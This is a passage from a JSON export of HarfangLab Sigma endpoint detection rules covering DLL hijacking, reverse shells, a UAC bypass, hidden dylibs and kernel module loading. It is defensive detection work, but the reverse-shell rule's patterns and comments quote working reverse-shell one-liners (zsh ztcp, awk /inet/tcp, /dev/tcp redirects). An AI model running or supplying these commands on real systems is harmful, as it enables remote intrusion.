'/private/var/db/???/'\n\n exclusion_claude:\n Image|contains:\n - '/claude/versions/'\n - '/claude-code/'\n - '/extensions/anthropic.claude-code-'\n - '/Users/*/.claude/'\n ImageLoaded: '/private/tmp/.????????????????-????????.node'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "03dfe441-3d70-41a1-8a9b-9e3c68cee99b", "rule_name": "Hidden Dylib File Loaded", "rule_description": "Detects a hidden dylib library being loaded.\nAdversaries can create hidden malicious libraries to avoid raising users' suspicions.\nIt is recommended to check the origin of the library to determine its legitimacy.\n", "rule_creation_date": "2024-06-03", "rule_modified_date": "2025-11-19", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1564.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "03fc1f68-4d9c-420b-b4a5-79fae4a133ee", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.591378Z", "creation_date": "2026-03-23T11:45:34.591382Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.591389Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/xforcered/WFH", "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_dsget.yml", "content": "title: DLL Hijacking via dsget.exe\nid: 03fc1f68-4d9c-420b-b4a5-79fae4a133ee\ndescription: |\n Detects potential Windows DLL Hijacking via dsget.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsget.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\activeds.dll'\n - '\\netapi32.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "03fc1f68-4d9c-420b-b4a5-79fae4a133ee", "rule_name": "DLL Hijacking via dsget.exe", "rule_description": "Detects potential Windows DLL Hijacking via dsget.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "04429fe5-8be4-4481-b930-acfc3c648434", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.075966Z", "creation_date": "2026-03-23T11:45:34.075968Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.075973Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_gpupdate.yml", "content": "title: DLL Hijacking via gpupdate.exe\nid: 04429fe5-8be4-4481-b930-acfc3c648434\ndescription: |\n Detects potential Windows DLL Hijacking via gpupdate.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'gpupdate.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\USERENV.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "04429fe5-8be4-4481-b930-acfc3c648434", "rule_name": "DLL Hijacking via gpupdate.exe", "rule_description": "Detects potential Windows DLL Hijacking via gpupdate.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0462a933-4c70-4baa-b836-58671ae8a94b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.095664Z", "creation_date": "2026-03-23T11:45:34.095666Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.095670Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux", "https://www.revshells.com/", "https://attack.mitre.org/techniques/T1059/004/", "https://attack.mitre.org/techniques/T1559/" ], "name": "t1059_004_reverse_shell_command_line_macos.yml", "content": "title: Reverse Shell Executed from Command-line\nid: 0462a933-4c70-4baa-b836-58671ae8a94b\ndescription: |\n Detects suspicious shell commands related to the execution of reverse shells.\n A reverse shell is a shell session that is initiated from a remote machine.\n Attackers often use reverse shells to bypass firewall restrictions.\n It is recommended to investigate the process that started the reverse shell, as well as any malcious actions the reverse could have taken.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://www.revshells.com/\n - https://attack.mitre.org/techniques/T1059/004/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2024/05/15\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.t1559\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_command:\n CommandLine|contains:\n - 'http://reverse-shell.sh/'\n - 'https://reverse-shell.sh/'\n - 'sh -i*>*/dev/tcp/*'\n - 'sh -i*>*/dev/udp/*'\n - 'exec *<>*/dev/tcp/*'\n - 'exec *<>*/dev/udp/*'\n - 'sh*0>*/dev/tcp/'\n - 'sh*0>*/dev/udp/'\n - 'sh -i <&3 >&3 2>&3'\n # openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect :\n - 's_client*-connect*:*|*sh*|*s_client*-connect*:*'\n # zsh -c 'zmodload zsh/net/tcp && ztcp 10.10.10.10 9001 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'\n - 'zmodload zsh/net/tcp * ztcp'\n - 'sh*>*/dev/tcp/'\n - 'sh*>*/dev/udp/'\n\n # awk 'BEGIN {s = \"/inet/tcp/0//\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null\n selection_awk_protocol:\n CommandLine|contains:\n - '/inet/tcp/'\n - '/inet/udp/'\n selection_awk_command:\n CommandLine|contains|all:\n - 'BEGIN '\n - 'printf'\n - 'getline '\n - 'close('\n\n exclusion_localhost:\n CommandLine|contains:\n - '/dev/tcp/127.0.0.1/'\n - '/dev/udp/127.0.0.1/'\n\n condition: selection_command or (all of selection_awk_*) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0462a933-4c70-4baa-b836-58671ae8a94b", "rule_name": "Reverse Shell Executed from Command-line", "rule_description": "Detects suspicious shell commands related to the execution of reverse shells.\nA reverse shell is a shell session that is initiated from a remote machine.\nAttackers often use reverse shells to bypass firewall restrictions.\nIt is recommended to investigate the process that started the reverse shell, as well as any malcious actions the reverse could have taken.\n", "rule_creation_date": "2024-05-15", "rule_modified_date": "2025-04-14", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1059.004", "attack.t1559" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0486b170-5b3c-4234-8610-a8881dfb1dbf", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.081276Z", "creation_date": "2026-03-23T11:45:34.081278Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.081282Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_taskkill.yml", "content": "title: DLL Hijacking via taskkill.exe\nid: 0486b170-5b3c-4234-8610-a8881dfb1dbf\ndescription: |\n Detects potential Windows DLL Hijacking via taskkill.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'taskkill.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbghelp.dll'\n - '\\framedynos.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n - '\\wbemprox.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0486b170-5b3c-4234-8610-a8881dfb1dbf", "rule_name": "DLL Hijacking via taskkill.exe", "rule_description": "Detects potential Windows DLL Hijacking via taskkill.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "04b80cc3-4931-4733-9085-38663dfb2e0c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.077465Z", "creation_date": "2026-03-23T11:45:34.077467Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.077472Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/" ], "name": "t1548_002_post_uac_bypass_fodhelper.yml", "content": "title: UAC Bypass Executed via fodhelper\nid: 04b80cc3-4931-4733-9085-38663dfb2e0c\ndescription: |\n Detects a process being spawned by fodhelper.exe.\n Fodhelper.exe has autoelevation capabilities and an integrity level of High.\n This is the result of an attack against a ShellExecuteW(\"ms-settings:optionalfeatures\") call inside fodhelper.\n Attackers may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n As such, it is recommended to look for other alerts related to ms-settings.\nreferences:\n - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/\ndate: 2020/10/12\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\fodhelper.exe'\n exclusion_werfault:\n Image:\n - '?:\\windows\\system32\\werfault.exe'\n - '?:\\windows\\syswow64\\werfault.exe'\n # c:\\windows\\system32\\werfault.exe -u -p 11444 -s 704\n CommandLine|contains: ' -u -p '\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "04b80cc3-4931-4733-9085-38663dfb2e0c", "rule_name": "UAC Bypass Executed via fodhelper", "rule_description": "Detects a process being spawned by fodhelper.exe.\nFodhelper.exe has autoelevation capabilities and an integrity level of High.\nThis is the result of an attack against a ShellExecuteW(\"ms-settings:optionalfeatures\") call inside fodhelper.\nAttackers may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nAs such, it is recommended to look for other alerts related to ms-settings.\n", "rule_creation_date": "2020-10-12", "rule_modified_date": "2025-02-03", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1548.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.627504Z", "creation_date": "2026-03-23T11:45:34.627506Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.627510Z", "rule_level": "medium", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1564/", "https://attack.mitre.org/techniques/T1036/" ], "name": "t1564_recycle_bin.yml", "content": "title: Process Executed from Recycle Bin Folder\nid: 04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44\ndescription: |\n Detects an execution from Recycle Bin folder.\n This folder is an uncommon directory for binaries to execute from and is often abused by attackers.\n It is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\nreferences:\n - https://attack.mitre.org/techniques/T1564/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2021/07/08\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: '?:\\\\?Recycle.Bin\\S-1-5-21-*\\$R'\n\n # Teams updater doing weird things\n exclusion_teams:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n exclusion_managesoft:\n ParentImage: '?:\\Program Files (x86)\\ManageSoft\\Tracker\\ndtrack.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44", "rule_name": "Process Executed from Recycle Bin Folder", "rule_description": "Detects an execution from Recycle Bin folder.\nThis folder is an uncommon directory for binaries to execute from and is often abused by attackers.\nIt is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\n", "rule_creation_date": "2021-07-08", "rule_modified_date": "2026-02-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1036", "attack.t1564" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "050e879b-c3c6-421d-8fc1-c03917f620d2", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.596684Z", "creation_date": "2026-03-23T11:45:34.596687Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.596695Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://linux.die.net/man/8/insmod", "https://man7.org/linux/man-pages/man8/kmod.8.html", "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1547.006/T1547.006.md", "https://attack.mitre.org/techniques/T1547/006/", "https://attack.mitre.org/techniques/T1014/" ], "name": "t1547_006_kernel_module_load_insmod.yml", "content": "title: Kernel Module Loaded via Insmod\nid: 050e879b-c3c6-421d-8fc1-c03917f620d2\ndescription: |\n Detects the execution of insmod to load a kernel module manually.\n Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\n They extend the functionality of the kernel without the need to reboot the system.\n For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.\n Adversaries may modify the kernel to automatically execute programs on system boot.\n It is recommended to analyze the context around the usage of insmod as well as to analyze the loaded module to look for malicious content or actions.\nreferences:\n - https://linux.die.net/man/8/insmod\n - https://man7.org/linux/man-pages/man8/kmod.8.html\n - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1547.006/T1547.006.md\n - https://attack.mitre.org/techniques/T1547/006/\n - https://attack.mitre.org/techniques/T1014/\ndate: 2023/12/15\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1547.006\n - attack.defense_evasion\n - attack.t1014\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Rootkit.Generic\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # Commands seen in malware:\n # insmod /root/my_malicious_malware.ko\n # insmod -- /root/my_malicious_malware.ko\n selection:\n Image|endswith: '/kmod'\n CommandLine|contains: 'insmod '\n\n # help and version\n exclusion_options_args:\n CommandLine|contains:\n - ' -h'\n - ' -V'\n - ' --help'\n - ' --version'\n\n exclusion_trendmicro:\n CommandLine:\n - 'insmod /opt/ds_agent/*/*.ko'\n - 'insmod /opt/TrendMicro/vls_agent/*/*.ko'\n\n # exclusion_package_manager:\n # TODO: Ancestors\n # # Yum\n # Ancestors|startswith: '/usr/bin/bash|/usr/bin/bash|/usr/libexec/platform-python*|/usr/libexec/platform-python*|'\n\n exclusion_kpatch:\n CommandLine:\n - 'insmod /var/lib/kpatch/*/livepatch-*.ko'\n - 'insmod /var/lib/kpatch/*/kpatch-*.ko'\n\n exclusion_symantec:\n CommandLine: '/sbin/insmod /opt/Symantec/autoprotect/.symevrm-custom-*.ko'\n\n exclusion_veeam:\n ProcessGrandparentImage: '/usr/sbin/veeamworker'\n\n exclusion_commvault:\n - ProcessCommandLine: 'insmod /lib/modules/*/kernel/drivers/*.ko'\n ProcessParentImage: '/opt/commvault/ksh'\n - ProcessGrandparentCommandLine: '/bin/bash /opt/commvault/Base/linux_drv.sh -a /opt/commvault/Base cvblk'\n\n exclusion_quadstorvtl:\n ProcessParentCommandLine: '/bin/bash /quadstorvtl/etc/quadstorvtl.init start'\n\n exclusion_yum_update:\n ProcessGrandparentCommandLine|startswith: '/usr/bin/sh /bin/kernel-install '\n\n exclusion_rpm:\n ProcessAncestors|contains: '|/usr/bin/rpm|'\n\n exclusion_veritas:\n ProcessCommandLine|startswith:\n - 'insmod /etc/vx/kernel/'\n - 'insmod /opt/VRTSgab/modules/'\n - 'insmod /opt/VRTSamf/modules/'\n - 'insmod /opt/VRTSvxfen/modules/'\n\n # https://github.com/quic/quic-usb-drivers/tree/master\n exclusion_quic:\n - ProcessParentCommandLine: '/bin/bash ./QcDevDriver.sh install'\n - ProcessCurrentDirectory: '/opt/QTI/QUD/BuildPackage/'\n\n exclusion_intel:\n ProcessCurrentDirectory: '/opt/intel/oneapi/vtune/20??.?/sepdk/src/'\n\n exclusion_aws:\n ProcessCommandLine|contains: 'aws-replication-driver.ko'\n ProcessAncestors|contains: '/aws-replication-installer-init|'\n\n exclusion_checkpoint:\n ProcessAncestors|contains: '|/var/lib/checkpoint/cpla/cpla|'\n\n exclusion_guardicore:\n - ProcessCommandLine: 'insmod /var/lib/guardicore/modules/*/gc-enforcement/*/gc-enforcement.ko'\n - ProcessAncestors|contains: '|/var/lib/guardicore/sbin/gc-agents-service|'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "050e879b-c3c6-421d-8fc1-c03917f620d2", "rule_name": "Kernel Module Loaded via Insmod", "rule_description": "Detects the execution of insmod to load a kernel module manually.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nThey extend the functionality of the kernel without the need to reboot the system.\nFor example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.\nAdversaries may modify the kernel to automatically execute programs on system boot.\nIt is recommended to analyze the context around the usage of insmod as well as to analyze the loaded module to look for malicious content or actions.\n", "rule_creation_date": "2023-12-15", "rule_modified_date": "2025-11-17", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1014", "attack.t1547.006" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "051bcdc2-56be-49af-bd6f-1fbac403ab5b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": 